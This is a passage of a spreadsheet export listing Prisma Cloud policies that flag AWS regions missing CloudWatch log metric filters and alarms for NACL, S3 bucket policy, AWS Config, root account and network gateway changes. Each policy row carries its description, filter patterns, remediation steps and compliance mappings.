      <c r="A2019"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Risk Management in Technology (RMiT), CSA CCM v.4.0.6, PCI DSS v4.0, Telecommunications Security Act - TSA, Australian Energy Sector Cyber Security Framework (AESCSF), PCI DSS v3.2.1, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ISO/IEC 27002:2013, ISO/IEC 27017:2015, ITSG-33, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CIS v1.3.0 (AWS), MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, CRI Profile v1.2.1, CSA CCM v4.0.12, APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, MPAA Content Protection Best Practices, ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, HITRUST CSF v.9.6.0, CIS Controls v7.1, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, Insurance Regulatory And Development Authority Of India, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), MTSBv2_AWS, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, NIST 800-53 Rev 5, CIS v1.5.0 (AWS) - Level 2, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, CIS v1.2.0 (AWS), PCI DSS v4.0, TX-RAMP Level 1, NIST SP 800-171 Revision 3, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, CDC NIST 800-53 Rev4, CRI Profile v2.0, CSA CCM v.4.0.1, ISO/IEC 27017:2015, TX-RAMP Level 2, CIS Controls v8,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CIS v2.0.0 (AWS) - Level 2, CSA CCM v.4.0.1, ISO/IEC 27002:2013, NIST CSF, CSA CCM v.4.0.1, CIS v1.4.0 (AWS), jneytchev-fedramp-low, Demo_Daryl ACSC Information Security Manual (ISM), CIS Controls v8.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, Risk Management in Technology (RMiT), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ACSC Information Security Manual (ISM), NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, CRI Profile v2.0, CSA CCM v.4.0.1,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CIS v3.0.0 (AWS) Level 2, ISO/IEC 27002:2013, DORA,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t>
        </is>
      </c>
      <c r="B2019" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2019" s="2" t="inlineStr"/>
      <c r="D2019" t="inlineStr"/>
      <c r="E2019" t="inlineStr"/>
      <c r="F2019" t="inlineStr"/>
      <c r="G2019" t="b">
        <v>1</v>
      </c>
      <c r="H20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19" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2019" t="inlineStr">
        <is>
          <t>aws-logs</t>
        </is>
      </c>
      <c r="K2019" t="inlineStr">
        <is>
          <t>AWS Log metric filter and alarm does not exist for Network Access Control Lists (NACL) changes</t>
        </is>
      </c>
      <c r="L2019" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2019" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2019" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2019" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2019" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2019" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2019" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2019" t="inlineStr"/>
      <c r="T2019" t="b">
        <v>0</v>
      </c>
      <c r="U2019" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2019" t="inlineStr">
        <is>
          <t>aws-logs-describe-metric-filters</t>
        </is>
      </c>
      <c r="W2019" t="inlineStr">
        <is>
          <t>This policy identifies the AWS regions which do not have a log metric filter and alarm for Network Access Control Lists (NACL) changes. Monitoring changes to NACLs will help ensure that AWS resources and services are not unintentionally exposed. It is recommended that a metric filter and alarm be established for changes made to NACLs.
NOTE: This policy will trigger alert if you have at least one Cloudtrail with the multi trial is enabled, Logs all management events in your account and is not set with specific log metric filter and alarm.</t>
        </is>
      </c>
      <c r="X2019"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CreateNetworkAcl) || ($.eventName = CreateNetworkAclEntry) || ($.eventName = DeleteNetworkAcl) || ($.eventName = DeleteNetworkAclEntry) || ($.eventName = ReplaceNetworkAclEntry) || ($.eventName = ReplaceNetworkAclAssociation)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19" t="inlineStr"/>
      <c r="Z2019"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CreateNetworkAcl and $.X.filterPattern contains CreateNetworkAclEntry and $.X.filterPattern contains DeleteNetworkAcl and $.X.filterPattern contains DeleteNetworkAclEntry and $.X.filterPattern contains ReplaceNetworkAclEntry and $.X.filterPattern contains ReplaceNetworkAclAssociation) and ($.X.metricTransformations[*] contains $.Y.metricName))'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2019" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2019" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2019" t="inlineStr">
        <is>
          <t>PC-AWS-CWT-510</t>
        </is>
      </c>
      <c r="AD2019" t="b">
        <v>1</v>
      </c>
      <c r="AE2019" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2019" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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19" t="inlineStr">
        <is>
          <t>0313adb1-fad6-4cfd-b873-e6ede8b88bd6</t>
        </is>
      </c>
      <c r="AI2019" t="inlineStr">
        <is>
          <t>17219f0c-6d25-4b34-8010-89d4a7b5862a</t>
        </is>
      </c>
      <c r="AJ2019" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2019" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2020">
      <c r="A2020"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Risk Management in Technology (RMiT), CSA CCM v.4.0.6, wells fargo CIS v1.5.0 (AWS) - Level 1, Australian Energy Sector Cyber Security Framework (AESCSF), MTSBv2_AWS, CIS v1.3.0 (AWS),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MITRE ATT&amp;CK v8.2 [Deprecated], NYDFS 23 CRR-NY 500.0, MPAA Content Protection Best Practices, ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, HITRUST CSF v.9.6.0, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, CIS v2.0.0 (AWS) - Level 1, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, CIS v1.5.0 (AWS) - Level 1, TX-RAMP Level 1, NIST SP 800-171 Revision 3, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, CDC NIST 800-53 Rev4, CRI Profile v2.0, CSA CCM v.4.0.1, ISO/IEC 27017:2015, TX-RAMP Level 2, CIS Controls v8, CIS v1.2.0 (AWS), Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, Fedramp (Moderate), NIST 800-53 Rev 5, NIST 800-53 Rev 5, CSA CCM v.4.0.1, CSA CCM v.4.0.1, CIS v1.4.0 (AWS),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Matt's ATT&amp;ACK, ISO/IEC 27002:2013, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, CIS v3.0.0 (AWS) Level 1, NIST SP 800-172, CSA CCM v.4.0.1, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27018:2019, NIST 800-53 Rev4, CSA CCM v.4.0.1, NIST CSF v2.0, ISO/IEC 27018:2019, NIST CSF, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2020" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C2020" s="2" t="inlineStr"/>
      <c r="D2020" t="n">
        <v>0</v>
      </c>
      <c r="E2020" t="n">
        <v>0</v>
      </c>
      <c r="F2020" t="n">
        <v>56</v>
      </c>
      <c r="G2020" t="b">
        <v>1</v>
      </c>
      <c r="H20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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2020" t="inlineStr">
        <is>
          <t>aws-logs</t>
        </is>
      </c>
      <c r="K2020" t="inlineStr">
        <is>
          <t>AWS Log metric filter and alarm does not exist for S3 bucket policy changes</t>
        </is>
      </c>
      <c r="L2020" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2020" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2020" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2020" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2020" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2020" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2020" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2020" t="inlineStr"/>
      <c r="T2020" t="b">
        <v>0</v>
      </c>
      <c r="U2020" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2020" t="inlineStr">
        <is>
          <t>aws-logs-describe-metric-filters</t>
        </is>
      </c>
      <c r="W2020" t="inlineStr">
        <is>
          <t>This policy identifies the AWS regions which do not have a log metric filter and alarm for S3 bucket policy changes. Monitoring changes to S3 bucket policies may reduce time to detect and correct permissive policies on sensitive S3 buckets. It is recommended that a metric filter and alarm be established for changes to S3 bucket policies.
NOTE: This policy will trigger alert if you have at least one Cloudtrail with the multi trial is enabled, Logs all management events in your account and is not set with specific log metric filter and alarm.</t>
        </is>
      </c>
      <c r="X2020"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0" t="inlineStr"/>
      <c r="Z2020"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"eventSource=" or $.X.filterPattern contains "eventSource =") and ($.X.filterPattern does not contain "eventSource!=" and $.X.filterPattern does not contain "eventSource !=") and $.X.filterPattern contains s3.amazonaws.com and $.X.filterPattern contains PutBucketAcl and $.X.filterPattern contains PutBucketPolicy and $.X.filterPattern contains PutBucketCors and $.X.filterPattern contains PutBucketLifecycle and $.X.filterPattern contains PutBucketReplication and $.X.filterPattern contains DeleteBucketPolicy and $.X.filterPattern contains DeleteBucketCors and $.X.filterPattern contains DeleteBucketLifecycle and $.X.filterPattern contains DeleteBucketReplication) and ($.X.metricTransformations[*] contains $.Y.metricName))'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2020" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2020" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2020" t="inlineStr">
        <is>
          <t>PC-AWS-CWT-507</t>
        </is>
      </c>
      <c r="AD2020" t="b">
        <v>1</v>
      </c>
      <c r="AE2020" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2020" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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0" t="inlineStr">
        <is>
          <t>bdf08087-35f0-4f32-8b16-357facc87fbb</t>
        </is>
      </c>
      <c r="AI2020" t="inlineStr">
        <is>
          <t>e946a059-16da-48a7-b7fb-ee08aae0015f</t>
        </is>
      </c>
      <c r="AJ2020" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2020" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2021">
      <c r="A2021"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CIS v3.0.0 (AWS) Level 2, Risk Management in Technology (RMiT), CSA CCM v.4.0.6, PCI DSS v4.0, Australian Energy Sector Cyber Security Framework (AESCSF), Microsoft Cloud Security Benchmark v1, PCI DSS v3.2.1, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CIS v1.3.0 (AWS), ITSG-33, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, CRI Profile v1.2.1, CSA CCM v4.0.12, APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, MPAA Content Protection Best Practices, ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, HITRUST CSF v.9.6.0, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, CIS v1.2.0 (AWS), ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, NIST 800-53 Rev 5, CIS v1.5.0 (AWS) - Level 2, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, MTSBv2_AWS, PCI DSS v4.0, TX-RAMP Level 1, NIST SP 800-171 Revision 3, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, CDC NIST 800-53 Rev4, CRI Profile v2.0, CSA CCM v.4.0.1, ISO/IEC 27017:2015, TX-RAMP Level 2, CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, Fedramp (Moderate), NIST 800-53 Rev 5, NIST 800-53 Rev 5, CSA CCM v.4.0.1, CSA CCM v.4.0.1, CIS v2.0.0 (AWS) - Level 2,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NIST CSF, CSA CCM v.4.0.1, jneytchev-fedramp-low, Demo_Daryl ACSC Information Security Manual (ISM),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CSA CCM v4.0.12, PCI DSS v4.0, CIS v1.4.0 (AWS), Matt's ATT&amp;ACK, ISO/IEC 27002:2013, DORA,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t>
        </is>
      </c>
      <c r="B2021" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2021" s="2" t="inlineStr"/>
      <c r="D2021" t="inlineStr"/>
      <c r="E2021" t="inlineStr"/>
      <c r="F2021" t="inlineStr"/>
      <c r="G2021" t="b">
        <v>1</v>
      </c>
      <c r="H20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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2021" t="inlineStr">
        <is>
          <t>aws-logs</t>
        </is>
      </c>
      <c r="K2021" t="inlineStr">
        <is>
          <t>AWS Log metric filter and alarm does not exist for AWS Config configuration changes</t>
        </is>
      </c>
      <c r="L2021" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2021" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2021" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2021" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2021" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2021" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2021" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2021" t="inlineStr"/>
      <c r="T2021" t="b">
        <v>0</v>
      </c>
      <c r="U2021" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2021" t="inlineStr">
        <is>
          <t>aws-logs-describe-metric-filters</t>
        </is>
      </c>
      <c r="W2021" t="inlineStr">
        <is>
          <t>This policy identifies the AWS regions which do not have a log metric filter and alarm for AWS Config configuration changes. Monitoring changes to AWS Config configuration will help ensure sustained visibility of configuration items within the AWS account. It is recommended that a metric filter and alarm be established for detecting changes to AWS Config's configurations.
NOTE: This policy will trigger alert if you have at least one Cloudtrail with the multi trial is enabled, Logs all management events in your account and is not set with specific log metric filter and alarm.</t>
        </is>
      </c>
      <c r="X2021"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($.eventSource = config.amazonaws.com) &amp;&amp; (($.eventName=StopConfigurationRecorder)||($.eventName=DeleteDeliveryChannel)||($.eventName=PutDeliveryChannel)||($.eventName=PutConfigurationRecorder))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1" t="inlineStr"/>
      <c r="Z2021"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"eventSource=" or $.X.filterPattern contains "eventSource =") and ($.X.filterPattern does not contain "eventSource!=" and $.X.filterPattern does not contain "eventSource !=") and $.X.filterPattern contains config.amazonaws.com and $.X.filterPattern contains StopConfigurationRecorder and $.X.filterPattern contains DeleteDeliveryChannel and $.X.filterPattern contains PutDeliveryChannel and $.X.filterPattern contains PutConfigurationRecorder) and ($.X.metricTransformations[*] contains $.Y.metricName))'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2021" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2021" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2021" t="inlineStr">
        <is>
          <t>PC-AWS-CWT-508</t>
        </is>
      </c>
      <c r="AD2021" t="b">
        <v>1</v>
      </c>
      <c r="AE2021" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2021" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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1" t="inlineStr">
        <is>
          <t>dfd6e8a5-83a5-403a-bd4a-3592b910b32b</t>
        </is>
      </c>
      <c r="AI2021" t="inlineStr">
        <is>
          <t>f7d16987-b4bc-4324-9b35-591144dfa02b</t>
        </is>
      </c>
      <c r="AJ2021" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2021" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2022">
      <c r="A2022" t="inlineStr">
        <is>
          <t>Telecommunications Security Act - TSA, Microsoft Cloud Security Benchmark v1, NIST SP 800-171 Revision 3, CIS v2.0.0 (AWS) - Level 1, TX-RAMP Level 2, NYDFS 23 CRR-NY 500.0, CIS v3.0.0 (AWS) Level 1, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, Microsoft Cloud Security Benchmark v1, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2024.2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, CIS Controls v8, HITRUST CSF v.11.2.0, CRI Profile v2.0, Secure Controls Framework (SCF) - 2024.2, NIST CSF v2.0, HIPAA, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CSA CCM v4.0.12, CIS Controls v7.1, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3</t>
        </is>
      </c>
      <c r="B2022" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C2022" s="2" t="inlineStr"/>
      <c r="D2022" t="n">
        <v>0</v>
      </c>
      <c r="E2022" t="n">
        <v>0</v>
      </c>
      <c r="F2022" t="n">
        <v>56</v>
      </c>
      <c r="G2022" t="b">
        <v>1</v>
      </c>
      <c r="H20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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2022" t="inlineStr">
        <is>
          <t>aws-logs</t>
        </is>
      </c>
      <c r="K2022" t="inlineStr">
        <is>
          <t>AWS Log metric filter and alarm does not exist for usage of root account</t>
        </is>
      </c>
      <c r="L2022" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2022" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2022" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2022" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2022" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2022" t="inlineStr">
        <is>
          <t>Restrict administrative privileges</t>
        </is>
      </c>
      <c r="R2022" t="inlineStr">
        <is>
          <t>Privileged account and group management events are centrally logged.</t>
        </is>
      </c>
      <c r="S2022" t="inlineStr"/>
      <c r="T2022" t="b">
        <v>0</v>
      </c>
      <c r="U2022" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2022" t="inlineStr">
        <is>
          <t>aws-logs-describe-metric-filters</t>
        </is>
      </c>
      <c r="W2022" t="inlineStr">
        <is>
          <t>This policy identifies the AWS regions that do not have a log metric filter and alarm for usage of a root account. Monitoring for root account logins will provide visibility into the use of a fully privileged account and an opportunity to reduce its use it. Failure to monitor root account logins may result in a lack of visibility into unauthorized use or attempts to access the root account, posing potential security risks to your AWS environment. It is recommended that a metric filter and alarm be established for detecting changes to CloudTrail's configurations.
NOTE: This policy will trigger alert if you have at least one Cloudtrail with the multi trial is enabled, Logs all management events in your account and is not set with specific log metric filter and alarm.</t>
        </is>
      </c>
      <c r="X2022" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS Console.
2. Navigate to the CloudWatch dashboard.
3. Click on 'Log groups' in the 'Logs' section (Left panel)
4. Select the log group created for your CloudTrail trail event logs (Cloudtrail should be multi-trail enabled with all Management Events captured) and click the Actions Dropdown Button -&gt; Click 'Create Metric Filter' button.
5. In the 'Define Pattern' page, add the 'Filter pattern' value as
{ $.userIdentity.type = "Root" &amp;&amp; $.userIdentity.invokedBy NOT EXISTS &amp;&amp; $.eventType != "AwsServiceEvent" }
and Click on 'NEXT'.
6. In the 'Assign Metric' page, Choose Filter Name, and Metric Details parameter according to your requirement and click on 'Next'.
7. Under the ‘Review and Create' page, Review details and click 'Create Metric Filter’.
8. To create an alarm based on a log group-metric filter, Refer to the below link 
    https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/Create_alarm_log_group_metric_filter.html</t>
        </is>
      </c>
      <c r="Y2022" t="inlineStr"/>
      <c r="Z2022"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does not contain "userIdentity.type!=" or $.X.filterPattern does not contain "userIdentity.type !=") and ($.X.filterPattern contains "userIdentity.type =" or $.X.filterPattern contains "userIdentity.type=") and ($.X.filterPattern contains "userIdentity.invokedBy NOT EXISTS") and ($.X.filterPattern contains "eventType!=" or $.X.filterPattern contains "eventType !=") and ($.X.filterPattern contains root or $.X.filterPattern contains Root) and ($.X.filterPattern contains AwsServiceEvent) and ($.X.metricTransformations[*] contains $.Y.metricName))'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2022" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2022" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2022" t="inlineStr">
        <is>
          <t>PC-AWS-CWT-1089</t>
        </is>
      </c>
      <c r="AD2022" t="b">
        <v>1</v>
      </c>
      <c r="AE2022" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2022" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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2" t="inlineStr">
        <is>
          <t>8987cf67-15a1-463b-a3f2-01ac79c4369b</t>
        </is>
      </c>
      <c r="AI2022" t="inlineStr">
        <is>
          <t>a6793171-a71f-48b4-9f62-09d7c7fe4a2e</t>
        </is>
      </c>
      <c r="AJ2022" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2022" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2023">
      <c r="A2023" t="inlineStr">
        <is>
          <t>CIS v1.5.0 (AWS) - Level 1, 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Risk Management in Technology (RMiT), CSA CCM v.4.0.6, PCI DSS v4.0, MTSBv2_AWS, Telecommunications Security Act - TSA,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CIS v1.3.0 (AWS), CSA CCM v4.0.12, APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, MPAA Content Protection Best Practices, ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, HITRUST CSF v.9.6.0, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CIS v2.0.0 (AWS) - Level 1, CSA CCM v.4.0.6, Copy of CIS Controls v8, Insurance Regulatory And Development Authority Of India, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, PCI DSS v4.0, TX-RAMP Level 1, NIST SP 800-171 Revision 3, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, CDC NIST 800-53 Rev4, CRI Profile v2.0, CSA CCM v.4.0.1, CIS v1.4.0 (AWS), ISO/IEC 27017:2015, TX-RAMP Level 2, CIS Controls v8,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CIS v3.0.0 (AWS) Level 1, NIST SP 800-171 Revision 3, ISO/IEC 27017:2015, Fedramp (Low), ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013,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Secure Controls Framework (SCF) - 2024.2, NIST CSF, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, Fedramp (Moderate), NIST CSF, ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, wells fargo CIS v1.5.0 (AWS) - Level 1,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CIS v1.2.0 (AWS), ISO/IEC 27018:2019, NIST CSF, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2023" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C2023" s="2" t="inlineStr"/>
      <c r="D2023" t="n">
        <v>0</v>
      </c>
      <c r="E2023" t="n">
        <v>0</v>
      </c>
      <c r="F2023" t="n">
        <v>55</v>
      </c>
      <c r="G2023" t="b">
        <v>1</v>
      </c>
      <c r="H20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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2023" t="inlineStr">
        <is>
          <t>aws-logs</t>
        </is>
      </c>
      <c r="K2023" t="inlineStr">
        <is>
          <t>AWS Log metric filter and alarm does not exist for Network gateways changes</t>
        </is>
      </c>
      <c r="L2023" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2023" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2023" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2023" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2023" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2023" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2023" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2023" t="inlineStr"/>
      <c r="T2023" t="b">
        <v>0</v>
      </c>
      <c r="U2023" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2023" t="inlineStr">
        <is>
          <t>aws-logs-describe-metric-filters</t>
        </is>
      </c>
      <c r="W2023" t="inlineStr">
        <is>
          <t>This policy identifies the AWS regions which do not have a log metric filter and alarm for Network gateways changes. Monitoring changes to network gateways will help ensure that all ingress/egress traffic traverses the VPC border via a controlled path. It is recommended that a metric filter and alarm be established for changes to network gateways.
NOTE: This policy will trigger alert if you have at least one Cloudtrail with the multi trial is enabled, Logs all management events in your account and is not set with specific log metric filter and alarm.</t>
        </is>
      </c>
      <c r="X2023"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CreateCustomerGateway) || ($.eventName = DeleteCustomerGateway) || ($.eventName = AttachInternetGateway) || ($.eventName = CreateInternetGateway) || ($.eventName = DeleteInternetGateway) || ($.eventName = DetachInternetGateway)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3" t="inlineStr"/>
      <c r="Z2023"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CreateCustomerGateway and $.X.filterPattern contains DeleteCustomerGateway and $.X.filterPattern contains AttachInternetGateway and $.X.filterPattern contains CreateInternetGateway and $.X.filterPattern contains DeleteInternetGateway and $.X.filterPattern contains DetachInternetGateway) and ($.X.metricTransformations[*] contains $.Y.metricName))'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2023" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2023" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2023" t="inlineStr">
        <is>
          <t>PC-AWS-CWT-511</t>
        </is>
      </c>
      <c r="AD2023" t="b">
        <v>1</v>
      </c>
      <c r="AE2023" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2023" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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3" t="inlineStr">
        <is>
          <t>cb805020-1c1e-461f-aafc-4d0e49ca5592</t>
        </is>
      </c>
